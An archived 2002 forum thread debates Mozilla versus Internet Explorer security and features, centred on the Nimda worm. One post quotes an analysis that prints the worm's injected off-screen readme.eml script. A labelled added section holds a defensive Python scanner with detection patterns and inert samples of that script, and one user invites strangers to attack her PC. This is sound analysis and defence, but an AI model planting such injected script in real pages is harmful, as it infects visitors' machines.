#84 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Sunday July 7th, 2002 10:55 PM

How then did your system get infected? Did you or anyone you know get NIMDA? Here's how NIMDA worked:

1. from client to client via email
2. from client to client via open network shares
3. from web server to client via browsing of compromised web sites
4. from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities (VU#111677 and CA-2001-12)
5. from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms

<http://www.cert.org/body/…es/CA200126_FA200126.html>

"... Note that any x86 email software that uses a vulnerable version of Internet Explorer to display HTML messages [1] will automatically execute the malicious attachment if the message is merely opened or previewed [4]. This happens because the worm MIME encodes the attachment to take advantage of a known vulnerability called "Automatic Execution of Embedded MIME Types" (see CERT advisory CA-2001-06 [1]). Microsoft's Outlook and Outlook Express are the most typical victims. Every ten days the worm regenerates its list of email addresses and sends itself to all....

If a vulnerable version of Internet Explorer is used to view or preview the message, the malicious attachment will be executed without the user's knowledge. Unpatched IE 5.01 and IE 5.5 without SP2 are vulnerable. Further, IE 6 can be vulnerable under specific conditions. See the PROTECT section for further information. Mail clients that are not using vulnerable versions of IE can also facilitate infection, but in those cases the user must double-click the attachment to execute the virus....

Once Nimda has infected a system, it searches the local hard drives for .HTML, .ASP, and .HTM files [3]. The worm also looks for files with INDEX, MAIN, or DEFAULT in the name [4]. If any such files are found, the worm creates a multi-part MIME-encoded copy of itself named README.EML in the same directory. Further, the worm adds a small piece of JavaScript to each one of the found files. The JavaScript, shown below, contains instructions to open a new browser window and download README.EML to the client. As described in the section regarding email propagation, if the client happens to be a vulnerable IE browser, the malicious program will be automatically executed and the machine viewing the web page will become infected.

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

The author of Nimda cleverly chose to write the JavaScript such that the new browser window will be opened outside the viewable desktop area so that the user may not even notice it. Browsers other than IE may force the window into the viewable area, and will not automatically execute README.EML." <http://216.239.35.100/sea…es&hl=en&ie=UTF-8>

NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day <http://zdnet.com.com/2100-1105-273420.html> - that sounds considerably more widespread than the 42 thousand fatality car wrecks in all of that year), didn't require any user execution. If you got it you probably got it by simply opening an email message or browsing a web page. That Microsoft offered patches to IE/Outlook to defend against this massive attack is an admission of inadequate security in their vulnerable applications. I didn't get infected by NIMDA while a good portion of my friends and family did. I attribute that to not using applications with inadequate security. Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't. All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application.

--Asa
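
Added example, not part of the thread or of the analysis quoted in the post above: a small Python scanner that walks a web root looking for the traces that analysis describes, namely a script call opening readme.eml appended to .html/.htm/.asp files and a README.EML file sitting in the same directory. The function names, the off-screen threshold and the sample tree are assumptions made for this example; the sample files are constructed and inert.

```python
import os
import re
import sys
import tempfile

# File types the quoted analysis says the worm searches for and modifies.
WEB_EXTENSIONS = {".html", ".htm", ".asp"}

# A script call that opens readme.eml in a new window. Tolerates case,
# whitespace and either quote style, so close variants of the quoted
# snippet are still caught.
INJECTED_RE = re.compile(rb"window\.open\(\s*[\"']readme\.eml[\"']", re.IGNORECASE)

# top=/left= window coordinates inside the call's feature string.
COORD_RE = re.compile(rb"(?:top|left)\s*=\s*(\d+)", re.IGNORECASE)

# Assumption for this example: a coordinate this large puts the window
# outside any visible desktop (the quoted snippet uses 6000).
OFFSCREEN_MIN = 3000


def scan_file(path):
    """Return details of the injected call in one file, or None if absent."""
    with open(path, "rb") as fh:
        data = fh.read()
    match = INJECTED_RE.search(data)
    if match is None:
        return None
    # Inspect only the call itself, up to its closing parenthesis.
    close = data.find(b")", match.end())
    end = close + 1 if close != -1 else match.end()
    coords = [int(v) for v in COORD_RE.findall(data[match.start():end])]
    return {
        "offset": match.start(),
        "offscreen": any(c >= OFFSCREEN_MIN for c in coords),
    }


def scan_tree(root):
    """Walk root and list web files carrying the injected call."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # The analysis says the worm drops README.EML beside modified files.
        eml_in_dir = any(name.lower() == "readme.eml" for name in files)
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            hit = scan_file(full)
            if hit is None:
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.append({"path": rel, "eml_in_dir": eml_in_dir, **hit})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree(root):
    """Create a constructed, inert directory tree to exercise the scanner."""
    injected = (b'<html><script language="JavaScript">window.open("readme.eml", '
                b'null, "resizable=no,top=6000,left=6000")</script></html>')
    samples = {
        "site/index.html": b"<html><body>clean page</body></html>",
        "site/default.asp": b"<html><body>home</body></html>\r\n" + injected,
        "site/README.EML": b"constructed placeholder, not a real message",
        # Variant spelling, and the .eml file already removed from this directory.
        "old/main.htm": b"<html></html><SCRIPT>window.open( 'README.EML' )</SCRIPT>",
        # Not a web page extension, so it is ignored even though the text matches.
        "old/notes.txt": injected,
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)


def run_sample():
    """Scan the constructed sample tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    # With a directory argument, scan it; otherwise scan the sample tree.
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_sample()
    for f in results:
        print(f"{f['path']}: injected call at byte {f['offset']}, "
              f"offscreen={f['offscreen']}, README.EML in dir={f['eml_in_dir']}")
```

A hit with no README.EML beside it usually means a partial cleanup: the dropped file was deleted but the page itself was never restored.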

#91 Re: Re: Not my exp

by kristen

Monday July 8th, 2002 6:41 PM

"How then did your system get infected?"

Well, to sum it up (from what I can remember): One time a virus was included with a new computer that was purchased via mail order several years ago from a company called 'Strobe Computers'. Another time I got one via a floppy disk from work that was later traced back to the boss's son (where he got it I don't know). Another time, via email, I got an attachment from a friend called 'fireworks.exe' (or something like that) that I ran without scanning first (shame on me). Another time I did receive the Iloveyou but I was aware of what it was so I didn't execute it, of course. There have been a few instances also where I have downloaded cracks (shame on me) that contained a virus of one type or another (I never actually got infected by it though). The worst kind of thing that I have come across, again from the crackers world, and again, shame on me, isn't even a virus. It's a program that does what it is supposed to do, and a little extra on the side. Something that av utilities cannot detect. I ran across one that removed the association for 'exe' types which proved to be a major nuisance and took me a while to figure out what was wrong.

"Did you or anyone you know get NIMDA?"

No. Melissa, Iloveyou, yes. Case in point, though, I have never ever heard of any widespread disaster as the result of web browsing.

"Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't."

I can't really speculate on that with the exception that the most widely used of anything will be the most subject to attack.

"All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application."

Are you suggesting then that if people were to switch to Mozilla that they no longer need anti-virus software, firewalls, etc.?

#97 Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:12 PM

"Are you suggesting then that if people were to switch to Mozilla that they no longer need anti-virus software, firewalls, etc.?"

Depends. I have no say in the firewall issue at work. We have an industrial strength firewall there that is supposed to prevent people on the outside getting inside. They also "require" that we use antivirus software on all our machines (I currently have 7 machines, three of them PCs running windows or linux, three of them macs running 8, 9, and X and one of them an OEOne machine running OEOne's HomeBase). I download and install the company recommended antivirus apps about once every 6 months on my windows and macintosh machines, run them, and find nothing. I attribute this to avoiding the virus, worm and other attacks aimed at the less secure Outlook and IE (although I do have to use IE for testing some of the time and I'm always a little bit apprehensive). At home I don't have a firewall but I'd like to get one because I occasionally run other networked apps that I'm not as confident about. But the overwhelming majority of my internet activity is using Mozilla and so I feel pretty comfortable that my system is secure. If a bug report about a security issue in Mozilla shows up and it worries me then I take the necessary precautions. Sometimes that means disabling JavaScript or some particular JS functionality (mozilla has more granular controls on JS than IE so this is less painful than it would be if I was using IE) or it might mean waiting a day or two before a patch is available and during that time I might not surf from home where I don't have the protection of an industrial strength firewall. That hasn't happened yet although I did stop using IE completely for a couple of weeks (while I waited on a patch from MS) after the announcement of one of the exploits this spring. I haven't been infected by a single virus or worm or been the victim of any security attack in over 2 years.
The last time I was a victim was at my old job where we were standardized on Outlook and IE and during that time I had several virus infections and an ad-ware app secretly installed by a malicious website (it kept popping up IE windows with random ads). And I had an app that IS said was a virus-installed backdoor that could allow a malicious website to read data off of my hard drive or other drives on our intranet. I have no idea whether or not my files were actually read though and IS was unable to tell from the firewall logs so they assumed that it didn't happen.

I believe that Outlook is probably the biggest security problem on the internet these days (both for corporations and individuals). Unfortunately that reflects poorly on IE and the Windows operating system because so many of the worm and virus attacks are actually exploiting holes in IE or other OS components that Outlook uses. As a matter of fact, the latest MS security patch for the hole in Windows Media Player was actually a patch to a vulnerable part of the IE cache that could be taken advantage of through WMP or other web-enabled apps that used that part of the IE cache.

I just don't trust those apps. I have very little in the way of files on my machine that would bother me if they got stolen so I'm not terribly worried about that but I would be in sorry shape if something corrupted or deleted some of my files. I'm sure that other people have lots of private information on their machines and MS has a poor track record when it comes to protecting user data. I recommend to people using apps with bad records on security that they find applications with better track records. Netscape and other Mozilla-based applications are a good choice as IE and especially Outlook replacements.

--Asa

#117 NIMDA vs Fatal Car Wreck

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 1:48 AM

> NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day <http://zdnet.com.com/2100-1105-273420.html> that sounds considerably more widespread than the 42 thousand fatality car wrecks in all of that year), didn't require any user execution. If you got it you probably got it by simply opening an email message or browsing a web page.

I can find no documented statistics indicating the breakdown of the methods by which NIMDA was spread, but I do know that at least 24% of the individual NIMDA infections that I have encountered were not accomplished via email; some instances were where the users were using Lotus Notes as their email client and other instances occurred in an environment where the mail server was equipped with antivirus software that filtered out all NIMDA infected email before it could reach the user.

Projecting my experience over the stats ZDnet gave in Asa's link yields the following :

24% of 1.2 million = 288,000 NIMDA infections by means other than email

So by this calculation, you would be about 6.9 times more likely to get NIMDA via a non-email method than to die in a car wreck.

(Note: the 42,000 represents a whole year whereas the 1.2 million was only accounting for the first few weeks of NIMDA and there were undoubtedly additional NIMDA infections during the following 11 months.)

Of course, some of those 288,000 could have been infected via file shares rather than web browsing. Of course, some of the other 76% could have been infected via web browsing.

However, even if the web browsing infections only made up 15% of the 288,000 (equal to 3.6% of the 1.2 million NIMDA infections) then that still would indicate that you were more likely to get NIMDA than die in a car wreck.

Remember now that we are only talking about NIMDA here; if you add in the numbers for other infections such as Klez then the comparison looks even worse for Microsoft.

Kristen, if you can find any factual evidence that indicates that IE was responsible for less than 3.6% of the total incidents of NIMDA and Klez, please provide us with links to that information.

#85 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:11 AM

> Did any of this occur via viewing a web page or simply opening an email? No. Back at you: "If your answer to these questions is yes then you're in the extreme minority." ;)

Your "Back at you" is just plain wrong. Nimda and Klez are two of the most widespread infections that we have seen and both are spread by simply viewing a web page or an email. People who encountered these virii/worms are not an extreme minority.

#82 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 9:56 PM

A little addendum here. To make things a bit easier I made a directory called c:\test. In that directory there are two files, one called mozilla.txt and the other called getme.exe.

Via email (<kristen_m@prodigy.net>) or a web page that I should visit tell me the contents of mozilla.txt and/or execute getme.exe

I said my specs earlier but I'll say again, IE6/OE6, WinXP Pro, NTFS, single hard disk partition.

Don't worry about serious damage, the worst that could possibly happen is a reinstall of windows and the mozilla user base increasing by 1. ;)

#86 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experie

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:14 AM

Are we also to assume that you have followed your own advice and you have not installed any recent MS Security patches?

#88 Re: tuxracer's comparison

by tuxracer

Monday July 8th, 2002 11:21 AM

Again, things like <http://www.malware.com/lookout.html> put you at the mercy of every e-mail you choose to read or website you choose to visit. It is possible that you will never get exploited, it is possible that you will and lose everything on your computer, etc...

Just like the car accident analogy. It is possible that you will never get in a car accident. However, people put on their seatbelts because just in case they /do/ get in a car accident their chances of dying are cut in half.

Say you own a house in the inner city. You could leave your doors and windows unlocked and it is possible that you will never be robbed. But with your doors and windows unlocked, anyone could just walk right in, you are at the mercy of the neighborhood. Most people don't like to be in that type of position so they choose to lock their doors.

Just like you could use a browser and e-mail client which has a known 18 different ways of getting in, and one very dangerous way in particular <http://www.malware.com/lookout.html>. IE/OE are like houses in the inner city with unlocked doors. It is possible that you won't get broken into, but you are at the mercy of your neighborhood (in this case a few billion people online - Every e-mail you choose to read or website you visit). I live in the inner city, and I lock my doors. It is possible that I may never get broken into, but I would rather not leave my house wide open just in case someone decides to try breaking in. I use Mozilla. It is possible that I could use IE/OE and never get exploited, but I would rather not use programs that are so vulnerable to exploit <http://jscript.dk/unpatched/> just in case someone tries. Again, that's just me.

#39 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 9:58 AM

The point is that you are at the mercy of every e-mail and every website you visit. You might not, I'll even say you probably will not, get exploited by someone taking advantage of the many holes (18 atm) in IE. However, like I said, you are at the mercy of every website you visit, and every e-mail you choose to read (if you're using any form of Outlook to read it, this includes Outlook Express, Outlook 2002, Outlook XP, etc... I need to make that clear because people tend to argue with me about it if I don't, they don't seem to realize that Outlook means all versions). And I don't know about you, but that simply is not a position I want to be in. But that's just me, each to their own I guess.

#16 Obviously biased list

by bk_raze

Thursday July 4th, 2002 7:28 PM

Tux, your list is obviously biased towards Mozilla 1.0. While I can't comment on Netcaptor or IE 5.5 for Mac, you left out many features that IE 6.0 has that Mozilla 1.0 does not have. It is clear to me that you carefully constructed this list to make Mozilla look so much better than IE 6.0 at first glance. I am sure that was your agenda, which is fine. However, if you are trying to construct an objective list, this is far from it.

#17 Re: tuxracer's comparison

by tuxracer

Friday July 5th, 2002 1:39 AM

"Tux, your list is obviously biased towards Mozilla 1.0...you left out many features that IE 6.0 has that Mozilla 1.0 does not have."

Really? Like what? It's pretty easy to say "It's biased", but please, point out specific things that I have missed.

#25 Re: Re: tuxracer's comparison

by bk_raze

Friday July 5th, 2002 6:42 PM

"Really? Like what?"

Tux, you probably don't use IE regularly enough to know. For me, I use IE regularly, and I can tell you that there are some features I find apparently missing in Mozilla 1.0 that IE has:

1. Ability to move the toolbars by simply dragging them and moving them (even combine 2 side by side).

2. Ability to selectively show and rearrange toolbar buttons.

3. Ability to show buttons as text with images, selective text, or just as pictures (4.x had this).

4. Ability to right click favorites (bookmarks) and perform operations (rename, delete) on them.

5. Ability to drag favorites (bookmarks) from the menu and move them around or into folders.

6. Automatic image resizing and image toolbar.

7. When working offline, pointer shows you whether a link can be viewed or not.

8. Ctrl+Enter allows you to type "yahoo" and it will add http://www. and .com for you.

9. Autocomplete for individual form fields.

10. Ability to search history by complete text.

Also, you should categorize your list as to separate usability features from compliance issues. Compliance issues are bugs. A non-bug is not a feature.

So for example, lack of support for CSS background-attachment:fixed is an IE bug, not a Mozilla feature. (Nobody would file a bug in bugzilla titled "Support for background-attachment:fixed" as an RFE--if mozilla didn't support it, it would be entered as a bug.) Meaning a browser (Mozilla or other) should be compliant--if not, it has compliance issues or bugs.

Hope this helps you.

#59 Re: Re: Re: tuxracer's comparison

by jsebrech

Sunday July 7th, 2002 8:08 AM

1. True. I miss this in mozilla.

2. You can hide anything on the toolbar with some userchrome, you can't rearrange it though. And editing textfiles to do stuff sucks. But the most popular things that people want to hide have gui options anyway, so it doesn't matter THAT much.

3. You can hide the text in mozilla mail and composer with some userchrome, again. No gui, again. Official position is that if people want this they should modify a theme to do this. I don't exactly agree with official position though.

4. I don't get this. Right-click where? In mozilla 1.0, I can right-click in the sidebar and get that menu, and I can right-click in the bookmarks dialog and get that menu. Are you talking about right-clicking an entry in a menu? Because that would be so wrong from a UI designer's point of view.

5. True. But you can do it in the sidebar (press F9 for immediate access, really fast), and you can do it in the bookmarks dialog, of course. I have to admit I'd like it in the menus too, though, for consistency's sake.

6. Ah, yes, that's handy. The only IE feature I think is really cool. Mozilla should have that.

7. You know, I never even knew about this. Just like the mozilla developers I use broadband, meaning I never disconnect. Point taken. Though it's easy to see whether a link is local or not by looking in the statusbar and seeing if the link starts with anything other than file://.

8. ? Uh huh. I see. Well. It's a feature. I suppose. Who thinks of this stuff? This is what location bar autocompletion is for.

9. Yeah, form autocompletion needs work in mozilla. I think there are plenty of bugs outstanding on it. I'm not the right guy to comment on it though. Anyway, it'll get fixed.

10. OK, handy. Maybe I'd use it. But then I never use history anyway. Google is my friend.

Anyway, if that's what IE has to offer, then I think mozilla has the better deal. Surely there must be more?

#66 Re: Re: Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 11:31 AM

Jsebrech, I welcome your reply, but my original goal was to help tux create a more objective list (if he wanted to listen) since he doesn't use IE regularly. Obviously, some of these features may not matter much to you. On the same note, there are features that only Mozilla has that don't mean much to me (you mentioned one--userchrome). I was glad to see that overall, you welcomed my list. The features I mentioned are ones that I personally make use of, some of them extensively.

I noticed you had some questions, which I will answer for you: 4. Right click favorites (bookmarks). "Are you talking about right-clicking an entry in a menu?" Yes, I did mean right-click from the menu. You see, in Mozilla, there are 2 ways to access bookmarks--menu or sidebar. I am a user that prefers to use the menu. However, I get hurt for this--users that prefer the menu don't get the luxury of right clicking a bookmark as the people that prefer the sidebar do. (Whether that would be poor UI design is another issue).

8. Ctrl+Enter adds http://www and .com for you. "Who thinks of this stuff?" I DO! I really make use of this one. To give you an example, if I want to go to ebay, I can type "ebay" and just hold ctrl in addition to hitting enter and I am there. I would be there before I even find it among my favorites! I am surprised that you flat out don't care about this one, but that is personal to you. Maybe you just haven't used it to see its usefulness.

"Surely there must be more?" There are several more reasons I use IE over Mozilla, which I don't think you want to hear. And if I told you them, they wouldn't be on topic--the post I put up was my response to tux's biased feature comparison.

#67 Re: Re: Re: Re: Re: tuxracer's comparison

by jsebrech

Sunday July 7th, 2002 12:10 PM

Sorry that I butted in :) It's a habit I can't seem to kick.

About right-clicking favourites. I'm sure that there would be a rash of weblog ranting by mpt and various other mozilla developers if anyone dared adding the feature you want. However, I'm also not surprised that there are people who like behaviour like that. My question to you is: do you like it because you've learned to use it, or do you like it because it's good behaviour? Anyway, this is all food for UI designers, and it's way out of my league.

For the ctrl+enter trick, to take your ebay example to mozilla... When I type "ebay.com" it takes me to the ebay website. Entering it once puts it in the autocompletion history. Now, whenever I type "ebay", the browser will add the ".com" for me. I just tested this to make sure this actually works. No ctrl necessary. A plain enter will do. But, ok, suppose you have a website that requires the www in front every time (I don't think autocompletion adds this), due to being misconfigured. If you visit it often, what do you do? You add it as a bookmark, and give it as a keyword whatever shorthand name you want. Short, simple, and again a simple enter will do to visit it, no ctrl necessary. This is why I think the "feature" you mention isn't really useful from the mozilla point of view.

Now, for sites you visit once, this may be a win. But honestly, I can't say I actually do that often. Most people have a fixed number of sites they visit often, and autocompletion and keywords are imho a much better solution for those. (Although for my daily sites bookmark groups serve me best)

#70 Re: Re: Re: Re: Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 1:05 PM

I can understand that you don't find ctrl+enter that useful. I mean, it's not a "big" feature, actually it is a very subtle one. But I do find it very useful. And yes, it mainly helps the first time you go to a site, but for that time, it does save typing :)

As for right-clicking favorites, yes, that would be a huge topic of debate. Being a user, I enjoy the way it works and it saves a lot of time, and I would never want this functionality taken away. To answer your question: "Do you like it because you've learned to use it, or do you like it because it's good behaviour?"

I am a user, and until you mentioned it, the thought of poor UI design never crossed my mind. I've come to expect the functionality of right clicking an object to modify it, even if it is a shortcut in a menu. Just like I do when I want to delete, rename, or change the icon on a shortcut from the Start menu. Maybe it is because I am a Windows user.

I am not a developer, but commenting on design, I think it is good behavior. Traditionally, only commands or options are on a menu, and you shouldn't be able to right-click a command or option. But favorites on a menu is an exception. A favorite is a shortcut to a document. And like any shortcut, I should be able to right-click it to open, delete, rename, or view its properties, change its icon, etc.

#72 but it _is_ there

by niner

Sunday July 7th, 2002 3:57 PM

Just type in any name and if Mozilla finds it nowhere else it will try <http://www.thenameyoutried.com> even without a ctrl.

#73 Only works if Internet Keywords are disabled

by AlexBishop <alex@mozillazine.org>

Sunday July 7th, 2002 4:52 PM

"Just type in any name and if Mozilla finds it nowhere else it will try <http://www.thenameyoutried.com> even without a ctrl."

Note that if Internet Keywords are enabled this doesn't work (Edit > Preferences > Navigator > Smart Browsing > Internet Keywords > Enable Internet Keywords).

Alex

#64 Re: Re: Re: tuxracer's comparison

by TheK <kl@3dots.de>

Sunday July 7th, 2002 10:26 AM

nice list, but..:

8. you need no Ctrl in Mozilla

9. doubleclick

#65 Re: tuxracer's comparison

by tuxracer

Sunday July 7th, 2002 10:49 AM

1-5. I agree

6. Iffy, kind of an annoyance.

7. Can't comment, never worked offline in either browser.

8. Add 4 more characters and you can get there yourself.

9. There is autocomplete for individual form fields.

10. Not sure what you mean.

"Also, you should categorize your list as to separate usability features from compliance issues."

I do plan on doing this eventually, though for a different reason.

"So for example, lack of support for CSS background-attachment:fixed is an IE bug, not a Mozilla feature."

Full CSS1 support /is/ a feature in my book. And each browser either has it or it doesn't. In this case Mozilla and IE on mac have it, and IE on Windows doesn't.

"Meaning a browser (Mozilla or other) should be compliant--if not, it has compliance issues or bugs."

Again, I feel that whether or not a browser has full CSS1 support or not is a feature.

"Hope this helps you."

It has. I will be updating the list with the things you've mentioned soon. Thanks.

#69 Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 12:22 PM

Tux, you seem to need some help with 6-10:

6. Image toolbar and resizing. "kind of an annoyance." That may be an annoyance to you personally. The fact is that the feature is there, and not putting it up because you don't like it is biased. I make use of these features. They can be turned off anyway.

7. Working offline. "Never worked offline." But some people do work offline. That is why I am mentioning it to you. You may not be aware of some features that other people use. I do work offline.

8. Ctrl+Enter. "Add 4 more characters and you can get there yourself." Again, you are refuting the feature because you don't use it. The fact is that the feature is there, whether you care to use it is personal to how you want to browse. I use this feature extensively.

9. Autocomplete for individual form fields. "There is autocomplete for individual form fields." I have seen its implementation in Mozilla. In IE, for each field, you have a dropdown list that shows all previous entries entered in that field. You'd have to see it to understand--it truly is for the individual field. If you want to dismiss this one because it technically "exists" in Mozilla then I can agree with you.

10. Search history by complete text. "Not sure what you mean." You don't seem to be aware of this feature, but don't dismiss this one. You can search the history for a specific word in the actual contents of a previously visited page, not just by the title of the page. I use this one too (especially with offline browsing).

Tux, the bottom line is that you shouldn't dismiss that a feature in IE exists because you don't use it. I personally make use of all of these features.

#22 Pause/resume download

by WillyWonka

Friday July 5th, 2002 3:46 PM

You have on the list that some of the browsers support pause and resume on the downloads, but do any of them support resuming from a disconnection?

eg I get disconnected at 95% and the browser realizes this and picks up where it left off (Similar to peer to peer file sharing programs).

#43 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:24 AM

That's actually interesting. I'm on a cable connection which hardly ever gets me disconnected, and if I do get disconnected it is for long periods of time due to some outage. So I haven't been able to experience this for myself. Anyone care to clue me in on whether or not Mozilla will automatically pause (after it detects the user has been disconnected from the net) and resume (after it detects the user has been reconnected) downloads?

#23 tuxracer: improve your html

by Chris_C

Friday July 5th, 2002 4:34 PM

tuxracer: on your comparison page <http://tinyurl.com/btw> you have the columns in your table displayed using fixed pixel widths. The resultant table is too large for my 800x600 display.

I tried just reducing the font size (neat-o moz feature!) but the columns remained the same width, which means you're trying to outsmart the browser. Either use proportional widths or don't specify them at all, and let the user's browser do what's best for the user's display.

And if you say "I designed for a bigger display, sorry", then I'm afraid the locals here may rise up and revoke your mozilla evang credentials :)

#38 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 9:55 AM

That is because I want the spacing to look a certain way. And I do not want the text to wrap, for the most part, and in certain places it is just so long it needs to wrap to fit on even 1024x768 displays. So I did the best I could to make it tidy, but that's about the best I can do without making the font a single point and hard to read for those who have resolutions higher than 800x600, which is most people.

#46 Tuxracer:

by rcmoz

Saturday July 6th, 2002 4:58 PM

About Sending Params from Keywords (i.e. being able to use "g penguins" to search google.com for the word penguins) -- you say IE can't do this, yet you also say there may be a way to do this in the registry -- which is it?

IE's been able to do this since IE4 when it came bundled with QuickSearch.exe -- all QuickSearch does is modify one bit of the registry:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\g
Set string (Default) = <http://www.google.com/search?q=%s>

That's it! You now have your Google Search.

#47 Massive Mozilla vs. Opera vs. IE6 comparorama

by rcmoz

Saturday July 6th, 2002 5:00 PM

#60 Re: Massive Mozilla vs. Opera vs. IE6 comparorama

by jsebrech

Sunday July 7th, 2002 8:51 AM

Sorry, but that comparison is just too old. There are a lot of things in there which aren't correct anymore because Mozilla evolves faster than people think. And also, the writer seems to have this impression that other browsers than Opera are slower than they in reality are. I've used Opera, I use Mozilla, on the same machine, a PII/233. Both were usable. Opera was faster, yes, but not that much faster. My guess is the author has a hard drive that dates from the dinosaur era.

#78 sidescrolling is worse than line wraps

by Chris_C

Sunday July 7th, 2002 8:17 PM

It's your choice to format it so that text does not wrap, but I submit that having to sidescroll back and forth to read each line is much worse than having undesirable line wraps. That is, once I saw your page required annoying sidescrolling to read each line, I bailed and moved on to something else. Which obviously defeats your purpose in setting up the page -- for people to read your results. Like I said, your choice.

#79 Re: sidescrolling is worse than line wraps

by Chris_C

Sunday July 7th, 2002 8:18 PM

Whoops, sorry, that was supposed to be a reply to another post in a thread...

#52 Success !!

by Dobbins

Saturday July 6th, 2002 8:37 PM

You can tell you have a winner when the microserfs get worried enough to start showing up with an Astroturf campaign.

#58 Attachments

by DJGM2002

Sunday July 7th, 2002 6:06 AM

"Just like an 'unsavvy' Mozilla user could run attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble."

Err, no. If you're referring to receiving attachments in the mail client of Mozilla, even if you double-click on an attachment, be it a harmless .txt file, or some dangerous .exe file, you get the choice, via a dialog box, to either save it or open it.

Mozilla's email and news client does NOT open any type of attachments automatically, whatever type of files they are, unlike Microsoft's email clients, Lookout and Lookout Distress, which are well known to do so.

#71 Name Games

by AlexBishop <alex@mozillazine.org>

Sunday July 7th, 2002 1:50 PM

> ...unlike Microsoft's email clients, Lookout and Lookout Distress

Personally, I prefer to call them Lookout and Outhouse Distress, but that's just me. :-)

Alex

#151 INTERNET EXPLORER VIRUS

by fooness

Sunday July 14th, 2002 1:27 PM

While the discussion is interesting, the correct data is missing.

The all-time Internet Explorer 'virus' or exploit is in fact something called:

js.exception

This is / was a problem with MSIE's VM which allows for complete write access to the hard drive.

Merely surfing the web will allow for install or writing to the client's hard drive. There is no shortage of infections continuing today.

It is Internet Explorer 5.5 specific. Which is the version that the vast majority of MS users have today. It requires nothing other than an unpatched version of 5.5.

Nimda, on the other hand, while primarily an internet worm, had a second vector via the web utilising a combination flaw of IE5.5 and the default Windows Media Player 6 to allow for execution.

Someone can do the math, surfers with a combination of IE5.5 and Windows Media Player 6 happening upon one of one hundred thousand infected MS servers vs. surfers with only IE5.5 happening upon a specially crafted website utilising js.exception.

Nimda today has died down but look at the count.

js.exception is very much still active today.

Run a search on google groups for js.exception.

There is no official tally yet on it as it is still "active"; certainly when all is said and done, there will be some very interesting statistics.

For an idiot's view of js.exception:

<http://antivirus.about.co…rary/weekly/aa041602a.htm>

for a more technical understanding search out the following:

com.ms.activeX.ActiveXComponent

Either one will certainly confirm that the automobile accident to web surfer ratio can most definitely be close.

Very simply put, Internet Explorer is flawed now and tomorrow. It is a poorly produced piece of software (by design) and can never be fixed properly unless re-written from scratch.

#155 Re: INTERNET EXPLORER VIRUS

by kristen

Monday July 15th, 2002 11:36 AM

"Either one will certainly confirm that the automobile accident to web surfer ratio can most definitely be close."

Yes, it could be close, can't say for sure with 100% certainty without more data. ;)

#158 Re: Re: INTERNET EXPLORER VIRUS

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:12 PM

"Yes, it could be close, can't say for sure with 100% certainty without more data."

Curious change there, kristen; how does that fit in with your claims of "several times over"??